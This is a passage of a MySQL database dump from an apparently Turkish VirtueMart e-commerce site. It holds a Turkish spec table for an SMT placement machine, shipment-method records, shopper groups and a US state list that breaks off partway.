center;\">\r\n<p>16-nozzle</p>\r\n</td>\r\n<td style=\"text-align: center;\">8-nozzle</td>\r\n<td style=\"text-align: center;\">2-nozzle</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>PCB Boyutları</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"3\">\r\n<p>50x50mm - 510 x 590mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Hız (Maks)</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>92,000cph</p>\r\n</td>\r\n<td style=\"text-align: center;\">43,000cph</td>\r\n<td style=\"text-align: center;\">8,500cph</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Dizilebilen Malzeme Aralığı</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>03015\" chip -</p>\r\n<p>L6xW6xT3mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>0402\" chip -</p>\r\n<p>L32xW32XT12mm </p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p> 0603\" chip -</p>\r\n<p>L100xW90XT28mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Dizgi Hassasiyeti</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>±0.037 mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>±0.030 mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>±0.030 mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum Feeder Sayısı</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"3\">\r\n<p>68 adet (8mm tape)   </p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Şerit Besleyiciler</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>8 - 56mm feeder</p>\r\n</td>\r\n<td style=\"text-align: center;\"><span style=\"font-size: 11px;\">8 - 56mm feeder</span> </td>\r\n<td style=\"text-align: center;\">\r\n<p><span style=\"font-size: 11px;\">8 - 104mm feeder</span> </p>\r\n<p>Stick: Maks. 8 adet</p>\r\n<p>Tray</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Matrix Tray</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>Tepsi sabitleyiciler</p>\r\n</td>\r\n<td style=\"text-align: center;\"> </td>\r\n<td style=\"text-align: center;\"> </td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Boyutlar</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"3\">\r\n<p>W 832mm x D 2448mm x H 1444mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Ağırlık</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"3\">\r\n<p>1,680kg (sadece gövde)</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p> </p>\r\n<p style=\"text-align: left;\"> </p>','NPM-D3A','','','','npm-d3a');
/*!40000 ALTER TABLE `fz6t4_virtuemart_products_tr_tr` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_rating_reviews`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_rating_reviews`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_rating_reviews` (
  `virtuemart_rating_review_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_rating_vote_id` int unsigned DEFAULT NULL,
  `virtuemart_product_id` int unsigned NOT NULL DEFAULT '0',
  `comment` varchar(15359) DEFAULT NULL,
  `review_ok` tinyint(1) NOT NULL DEFAULT '0',
  `review_rates` int unsigned NOT NULL DEFAULT '0',
  `review_ratingcount` int unsigned NOT NULL DEFAULT '0',
  `review_rating` decimal(10,2) NOT NULL DEFAULT '0.00',
  `review_language` varchar(10) DEFAULT NULL,
  `review_editable` tinyint(1) NOT NULL DEFAULT '1',
  `lastip` char(50) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `customer` varchar(128) NOT NULL DEFAULT '',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_rating_review_id`),
  KEY `created_on` (`created_on`),
  KEY `created_by` (`created_by`),
  KEY `published` (`published`),
  KEY `virtuemart_rating_vote_id` (`virtuemart_rating_vote_id`),
  KEY `virtuemart_product_id` (`virtuemart_product_id`,`created_by`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_rating_reviews`
--

LOCK TABLES `fz6t4_virtuemart_rating_reviews` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_rating_reviews` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_rating_reviews` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_rating_votes`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_rating_votes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_rating_votes` (
  `virtuemart_rating_vote_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_product_id` int unsigned NOT NULL DEFAULT '0',
  `vote` int NOT NULL DEFAULT '0',
  `lastip` char(50) NOT NULL DEFAULT '0',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_rating_vote_id`),
  KEY `created_by` (`created_by`),
  KEY `created_on` (`created_on`),
  KEY `virtuemart_product_id` (`virtuemart_product_id`,`created_by`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='Stores all ratings for a product';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_rating_votes`
--

LOCK TABLES `fz6t4_virtuemart_rating_votes` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_rating_votes` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_rating_votes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_ratings`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_ratings`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_ratings` (
  `virtuemart_rating_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_product_id` int unsigned NOT NULL DEFAULT '0',
  `rates` int NOT NULL DEFAULT '0',
  `ratingcount` int unsigned NOT NULL DEFAULT '0',
  `rating` decimal(10,1) NOT NULL DEFAULT '0.0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_rating_id`),
  UNIQUE KEY `virtuemart_product_id` (`virtuemart_product_id`,`virtuemart_rating_id`),
  KEY `published` (`published`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='Stores all ratings for a product';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_ratings`
--

LOCK TABLES `fz6t4_virtuemart_ratings` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_ratings` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_ratings` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_shipment_plg_weight_countries`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_shipment_plg_weight_countries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_shipment_plg_weight_countries` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_order_id` int unsigned DEFAULT NULL,
  `order_number` char(32) DEFAULT NULL,
  `virtuemart_shipmentmethod_id` mediumint unsigned DEFAULT NULL,
  `shipment_name` varchar(5000) DEFAULT NULL,
  `order_weight` decimal(10,4) DEFAULT NULL,
  `shipment_weight_unit` char(3) DEFAULT 'KG',
  `shipment_cost` decimal(10,2) DEFAULT NULL,
  `shipment_package_fee` decimal(10,2) DEFAULT NULL,
  `tax_id` smallint DEFAULT NULL,
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=16 DEFAULT CHARSET=utf8mb3 COMMENT='Shipment Weight Countries Table';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_shipment_plg_weight_countries`
--

LOCK TABLES `fz6t4_virtuemart_shipment_plg_weight_countries` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_shipment_plg_weight_countries` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_shipment_plg_weight_countries` VALUES (1,1,'41a603',1,'<span class=\"vmshipment_name\">Yurtiçi Kargo</span>',0.0000,'KG',0.00,0.00,-1,'2014-08-07 06:45:52',677,'2014-08-07 06:45:52',677,'0000-00-00 00:00:00',0),(2,2,'d29404',2,'<span class=\"vmshipment_name\">3S-Depo Teslim</span>',0.0000,'KG',0.00,0.00,-1,'2014-08-07 08:17:57',677,'2014-08-07 08:17:57',677,'0000-00-00 00:00:00',0),(3,3,'706405',1,'<span class=\"vmshipment_name\">Yurtiçi Kargo</span>',0.0000,'KG',0.00,0.00,-1,'2014-08-07 08:41:55',677,'2014-08-07 08:41:55',677,'0000-00-00 00:00:00',0),(4,4,'630406',2,'<span class=\"vmshipment_name\">3S-Depo Teslim</span>',0.0000,'KG',0.00,0.00,-1,'2014-08-08 07:07:48',677,'2014-08-08 07:07:48',677,'0000-00-00 00:00:00',0),(5,5,'9f7b07',2,'<span class=\"vmshipment_name\">3S-Depo Teslim</span>',0.0000,'KG',0.00,0.00,-1,'2014-08-08 07:08:53',677,'2014-08-08 07:08:53',677,'0000-00-00 00:00:00',0),(6,6,'166c08',2,'<span class=\"vmshipment_name\">3S-Depo Teslim</span>',0.0000,'KG',0.00,0.00,-1,'2014-08-08 07:10:26',677,'2014-08-08 07:10:26',677,'0000-00-00 00:00:00',0),(7,7,'e8c009',2,'<span class=\"vmshipment_name\">3S-Depo Teslim</span>',0.0000,'KG',0.00,0.00,-1,'2014-08-08 07:11:11',677,'2014-08-08 07:11:11',677,'0000-00-00 00:00:00',0),(8,8,'d844010',2,'<span class=\"vmshipment_name\">3S-Depo Teslim</span>',0.0000,'KG',0.00,0.00,-1,'2014-08-08 07:11:40',677,'2014-08-08 07:11:40',677,'0000-00-00 00:00:00',0),(9,9,'acf5011',2,'<span class=\"vmshipment_name\">3S-Depo Teslim</span>',0.0000,'KG',0.00,0.00,-1,'2014-08-08 07:12:14',677,'2014-08-08 07:12:14',677,'0000-00-00 00:00:00',0),(10,10,'241b012',2,'<span class=\"vmshipment_name\">3S-Depo Teslim</span>',0.0000,'KG',0.00,0.00,-1,'2014-08-08 07:13:15',677,'2014-08-08 07:13:15',677,'0000-00-00 00:00:00',0),(11,11,'4448013',2,'<span class=\"vmshipment_name\">3S-Depo Teslim</span>',0.0000,'KG',0.00,0.00,-1,'2014-08-08 07:15:34',677,'2014-08-08 07:15:34',677,'0000-00-00 00:00:00',0),(12,12,'b6cb014',2,'<span class=\"vmshipment_name\">3S-Depo Teslim</span>',0.0000,'KG',0.00,0.00,-1,'2014-08-08 07:16:25',677,'2014-08-08 07:16:25',677,'0000-00-00 00:00:00',0),(13,13,'06df015',2,'<span class=\"vmshipment_name\">3S-Depo Teslim</span>',0.0000,'KG',0.00,0.00,-1,'2014-08-08 07:16:57',677,'2014-08-08 07:16:57',677,'0000-00-00 00:00:00',0),(14,14,'G6NQ016',1,'<span class=\"vmshipment_name\">Yurtiçi Kargo</span><span class=\"vmshipment_description\">Ödeme alıcı tarafından yapılır.</span>',0.0000,'KG',0.00,0.00,-1,'2019-08-06 12:15:14',0,'2019-08-06 12:15:14',0,'0000-00-00 00:00:00',0),(15,15,'AUQ3017',1,'<span class=\"vmshipment_name\">Yurtiçi Kargo</span><span class=\"vmshipment_description\">Ödeme alıcı tarafından yapılır.</span>',0.0000,'KG',0.00,0.00,-1,'2020-02-13 11:02:04',0,'2020-02-13 11:02:04',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_shipment_plg_weight_countries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_shipmentmethod_shoppergroups`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_shipmentmethod_shoppergroups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_shipmentmethod_shoppergroups` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_shipmentmethod_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_shoppergroup_id` int unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `virtuemart_shipmentmethod_id` (`virtuemart_shipmentmethod_id`,`virtuemart_shoppergroup_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='xref table for shipment to shoppergroup';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_shipmentmethod_shoppergroups`
--

LOCK TABLES `fz6t4_virtuemart_shipmentmethod_shoppergroups` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_shipmentmethod_shoppergroups` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_shipmentmethod_shoppergroups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_shipmentmethods`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_shipmentmethods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_shipmentmethods` (
  `virtuemart_shipmentmethod_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` int unsigned NOT NULL DEFAULT '1',
  `shipment_jplugin_id` int NOT NULL DEFAULT '0',
  `shipment_element` varchar(50) NOT NULL DEFAULT '',
  `shipment_params` text,
  `currency_id` int unsigned DEFAULT NULL,
  `ordering` int NOT NULL DEFAULT '0',
  `shared` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_shipmentmethod_id`),
  KEY `shipment_jplugin_id` (`shipment_jplugin_id`),
  KEY `ordering` (`ordering`),
  KEY `shipment_element` (`shipment_element`,`virtuemart_vendor_id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb3 COMMENT='Shipment created from the shipment plugins';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_shipmentmethods`
--

LOCK TABLES `fz6t4_virtuemart_shipmentmethods` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_shipmentmethods` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_shipmentmethods` VALUES (1,1,10020,'weight_countries','shipment_logos=\"\"|show_on_pdetails=\"0\"|categories=\"\"|blocking_categories=\"\"|countries=\"\"|zip_start=\"\"|zip_stop=\"\"|weight_start=\"\"|weight_stop=\"\"|weight_unit=\"KG\"|nbproducts_start=0|nbproducts_stop=0|min_amount=\"\"|max_amount=\"\"|shipment_cost=\"0\"|package_fee=\"\"|tax_id=\"-1\"|free_shipment=\"\"|',144,0,0,1,'2014-08-07 06:44:41',676,'2017-11-05 11:38:18',676,'0000-00-00 00:00:00',0),(2,1,10020,'weight_countries','shipment_logos=\"\"|countries=\"\"|zip_start=\"\"|zip_stop=\"\"|weight_start=\"\"|weight_stop=\"\"|weight_unit=\"KG\"|nbproducts_start=0|nbproducts_stop=0|min_amount=\"\"|max_amount=\"\"|cost=\"\"|package_fee=\"\"|tax_id=\"-1\"|free_shipment=\"\"|',NULL,0,0,1,'2014-08-07 06:47:05',676,'2014-08-07 06:47:20',676,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_shipmentmethods` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_shipmentmethods_en_gb`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_shipmentmethods_en_gb`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_shipmentmethods_en_gb` (
  `virtuemart_shipmentmethod_id` int unsigned NOT NULL,
  `shipment_name` varchar(180) NOT NULL DEFAULT '',
  `shipment_desc` varchar(19000) NOT NULL DEFAULT '',
  `slug` varchar(192) NOT NULL DEFAULT '',
  PRIMARY KEY (`virtuemart_shipmentmethod_id`),
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_shipmentmethods_en_gb`
--

LOCK TABLES `fz6t4_virtuemart_shipmentmethods_en_gb` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_shipmentmethods_en_gb` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_shipmentmethods_en_gb` VALUES (1,'Yurtiçi Kargo','','yurtiçi-kargo'),(2,'3S-Warehouse Pickup','','3s-depo-teslim');
/*!40000 ALTER TABLE `fz6t4_virtuemart_shipmentmethods_en_gb` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_shipmentmethods_tr_tr`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_shipmentmethods_tr_tr`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_shipmentmethods_tr_tr` (
  `virtuemart_shipmentmethod_id` int unsigned NOT NULL,
  `shipment_name` varchar(180) NOT NULL DEFAULT '',
  `shipment_desc` varchar(19000) NOT NULL DEFAULT '',
  `slug` varchar(192) NOT NULL DEFAULT '',
  PRIMARY KEY (`virtuemart_shipmentmethod_id`),
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_shipmentmethods_tr_tr`
--

LOCK TABLES `fz6t4_virtuemart_shipmentmethods_tr_tr` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_shipmentmethods_tr_tr` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_shipmentmethods_tr_tr` VALUES (1,'Yurtiçi Kargo','Ödeme alıcı tarafından yapılır.','yurtiçi-kargo'),(2,'3S-Depo Teslim','','3s-depo-teslim');
/*!40000 ALTER TABLE `fz6t4_virtuemart_shipmentmethods_tr_tr` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_shoppergroups`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_shoppergroups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_shoppergroups` (
  `virtuemart_shoppergroup_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` int unsigned NOT NULL DEFAULT '1',
  `shopper_group_name` varchar(128) DEFAULT NULL,
  `shopper_group_desc` varchar(255) DEFAULT NULL,
  `custom_price_display` tinyint(1) NOT NULL DEFAULT '0',
  `price_display` blob NOT NULL,
  `sgrp_additional` tinyint(1) NOT NULL DEFAULT '0',
  `default` tinyint(1) NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  `shared` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_shoppergroup_id`),
  KEY `virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `shopper_group_name` (`shopper_group_name`),
  KEY `ordering` (`ordering`),
  KEY `shared` (`shared`),
  KEY `published` (`published`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb3 COMMENT='Shopper Groups that users can be assigned to';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_shoppergroups`
--

LOCK TABLES `fz6t4_virtuemart_shoppergroups` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_shoppergroups` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_shoppergroups` VALUES (2,1,'COM_VIRTUEMART_SHOPPERGROUP_DEFAULT','COM_VIRTUEMART_SHOPPERGROUP_DEFAULT_DESCR',0,'',0,1,0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(1,1,'COM_VIRTUEMART_SHOPPERGROUP_GUEST','COM_VIRTUEMART_SHOPPERGROUP_GUEST_DESCR',0,'',0,2,0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_shoppergroups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_states`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_states`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_states` (
  `virtuemart_state_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` int unsigned NOT NULL DEFAULT '1',
  `virtuemart_country_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_worldzone_id` int unsigned NOT NULL DEFAULT '0',
  `state_name` varchar(64) DEFAULT NULL,
  `state_3_code` char(3) DEFAULT NULL,
  `state_2_code` char(2) DEFAULT NULL,
  `ordering` int NOT NULL DEFAULT '0',
  `shared` tinyint(1) NOT NULL DEFAULT '1',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_state_id`),
  UNIQUE KEY `state_3_code` (`virtuemart_vendor_id`,`virtuemart_country_id`,`state_3_code`),
  UNIQUE KEY `state_2_code` (`virtuemart_vendor_id`,`virtuemart_country_id`,`state_2_code`),
  KEY `virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `virtuemart_country_id` (`virtuemart_country_id`),
  KEY `ordering` (`ordering`),
  KEY `shared` (`shared`),
  KEY `published` (`published`)
) ENGINE=MyISAM AUTO_INCREMENT=730 DEFAULT CHARSET=utf8mb3 COMMENT='States that are assigned to a country';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_states`
--

LOCK TABLES `fz6t4_virtuemart_states` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_states` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_states` VALUES (1,1,223,0,'Alabama','ALA','AL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(2,1,223,0,'Alaska','ALK','AK',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(3,1,223,0,'Arizona','ARZ','AZ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(4,1,223,0,'Arkansas','ARK','AR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(5,1,223,0,'California','CAL','CA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(6,1,223,0,'Colorado','COL','CO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(7,1,223,0,'Connecticut','CCT','CT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(8,1,223,0,'Delaware','DEL','DE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(9,1,223,0,'District Of Columbia','DOC','DC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(10,1,223,0,'Florida','FLO','FL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(11,1,223,0,'Georgia','GEA','GA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(12,1,223,0,'Hawaii','HWI','HI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(13,1,223,0,'Idaho','IDA','ID',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(14,1,223,0,'Illinois','ILL','IL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(15,1,223,0,'Indiana','IND','IN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(16,1,223,0,'Iowa','IOA','IA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(17,1,223,0,'Kansas','KAS','KS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(18,1,223,0,'Kentucky','KTY','KY',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(19,1,223,0,'Louisiana','LOA','LA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(20,1,223,0,'Maine','MAI','ME',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(21,1,223,0,'Maryland','MLD','MD',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(22,1,223,0,'Massachusetts','MSA','MA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(23,1,223,0,'Michigan','MIC','MI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(24,1,223,0,'Minnesota','MIN','MN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(25,1,223,0,'Mississippi','MIS','MS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(26,1,223,0,'Missouri','MIO','MO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(27,1,223,0,'Montana','MOT','MT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(28,1,223,0,'Nebraska','NEB','NE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(29,1,223,0,'Nevada','NEV','NV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 